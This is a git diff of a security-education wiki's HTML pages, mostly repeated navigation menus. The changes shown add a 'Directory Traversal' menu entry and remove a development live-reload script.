      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -198,22 +198,6 @@

AT&T

- - diff --git a/docs/Reverse Engineering/Basic Reverse Engineering using objdump, strace, and ltrace.html b/docs/Reverse Engineering/Basic Reverse Engineering using objdump, strace, and ltrace.html index e60315b7..3b4df521 100644 --- a/docs/Reverse Engineering/Basic Reverse Engineering using objdump, strace, and ltrace.html +++ b/docs/Reverse Engineering/Basic Reverse Engineering using objdump, strace, and ltrace.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -209,22 +209,6 @@

- const wsProtocol = location.protocol === 'https:' ? 'wss:' : 'ws:'; - const wsAddress = wsProtocol + "//" + location.host + "/" + "__livereload"; - const socket = new WebSocket(wsAddress); - socket.onmessage = function (event) { - if (event.data === "reload") { - socket.close(); - location.reload(); - } - }; - - window.onbeforeunload = function() { - socket.close(); - } - diff --git a/docs/Reverse Engineering/Binary Formats/ELF/Dynamic Linking.html b/docs/Reverse Engineering/Binary Formats/ELF/Dynamic Linking.html index 2cec7a8b..5a91ef7d 100644 --- a/docs/Reverse Engineering/Binary Formats/ELF/Dynamic Linking.html +++ b/docs/Reverse Engineering/Binary Formats/ELF/Dynamic Linking.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
